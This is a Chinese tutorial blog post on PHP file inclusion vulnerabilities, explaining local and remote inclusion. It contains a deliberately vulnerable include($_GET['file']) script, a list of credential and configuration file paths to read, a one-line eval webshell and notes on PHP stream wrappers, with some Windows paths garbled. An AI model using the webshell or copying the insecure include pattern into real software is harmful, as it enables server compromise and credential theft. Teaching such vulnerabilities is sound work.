zoukankan      html  css  js  c++  java

  • 原理篇—文件包含漏洞

    文件包含漏洞

      开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。

      为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。

    1. 包含漏洞原理解析

      大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。

      PHP中提供了四个文件包含的函数:

    • include( )
      当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行
    • include_once( )
      功能与 Include()相同,区别在于当重复调用同一文件时,程序只调用一次
    • require( )
      require()与 include()的区别在于 require()执行如果发生错误,函数会输出错误信息,并终止脚本的运行。
    • require_once( )
      功能与 require()相同,区别在于当重复调用同一文件时,程序只调用一次。

    2. 文件包含分类

      2.1 本地文件包含

         当包含的文件在服务器本地时,就形成了本地文件包含。

       做个简单的测试:

       index.php:这里用GET获取文件名

    <?php
    $file = $_GET['file'];
    if(isset($file)){
        include("$file");
    }else{
        echo "file fail!";
    }
?>

      include.php :被包含的文件。实际上被包含文件可以是任意格式的,即便与当前编程语言无关,甚至可以是图片,只要文件被包含,其内容会被包含文件包含,并以当前服务器脚本语言执行。

    <?php
    phpinfo();

    ?>

      运行结果展示:

      

         这时,如果被包含的文件内容不符合php语言规范的,会直接将文件内容(源代码)输出,如:

        

      2.2 远程文件包含

        要使用远程文件包含功能,首先要确定PHP是否开启远程文件包含功能选项(默认为关闭),需要再php.ini配置文件中修改,修改后重启Web容器服务使其生效,修改内容:
     
           //把off更改为on

         下面是PHP远程文件包含的例子:

        index.php页面的代码不变,我们在虚拟机创建被包含文件,文件内容:

        

         访问URL:http://192.168.3.134/814/123.txt(这里我们知道虚拟机的ip,换掉127.0.0.1),包含成功

        

     3. 文件包含利用

      3.1 读取敏感文件

        常见的敏感信息路径:

        Windows系统

      c:oot.ini // 查看系统版本

      c:windowssystem32inetsrvMetaBase.xml // IIS配置文件

      c:windows epairsam // 存储Windows系统初次安装的密码

      c:ProgramFilesmysqlmy.ini // MySQL配置

      c:ProgramFilesmysqldatamysqluser.MYD // MySQL root密码

      c:windowsphp.ini // php 配置信息

        Linux/Unix系统

      /etc/passwd // 账户信息

      /etc/shadow // 账户密码文件

      /usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

      /usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

      /usr/local/app/php5/lib/php.ini // PHP相关配置

      /etc/httpd/conf/httpd.conf // Apache配置文件

      /etc/my.conf // mysql 配置文件

       3.2  远程包含Shell

          如果目标主机 allow_url_fopen 选项是激活的,就可以尝试远程包含一句话木马。通过上文远程包含提到的方法和内容进行上传,可以在访问的目录下生成shell,内容为:

          <?php @eval($_POST['cgq'])?>

          然后通过蚁剑就可以连接:

          

        3.3  本地包含配合文件上传

          可以通过上传文件的方式上传一句话木马并拿到路径,在URL中接路径,包含一句话木马的文件.

        3.4 使用PHP封装协议  

    名称 含义
    file:// 访问本地文件系统
    http:// 访问 HTTP(s) 网址
    fftp:// 访问 FTP(s) URLs
    php:// 访问各个输入/输出流(I/O streams)
    zlib:// 压缩流
    data:// 数据(RFC 2397)
    ssh2:// Secure Shell 2
    expect:// 处理交互式的流
    glob:// 查找匹配的文件路径模式
    phar PHP归档

        

          

     
     
  • 相关阅读:
    9种纯CSS3人物信息卡片动态展示效果
    CSS3 animation属性 实现转动效果
    炫酷CSS3垂直时间轴特效
    css实现翻面效果
    uniapp上传图片转base64码
    经常使用的js三元表达式
    async/await 使用
    Python的OS模块批量修改文件名
    解决Tomcat对POST请求文件上传大小的限制
    HTTP 413错误解决方法
  • 原文地址:https://www.cnblogs.com/guoqingsentou/p/13695449.html
Copyright © 2011-2022 走看看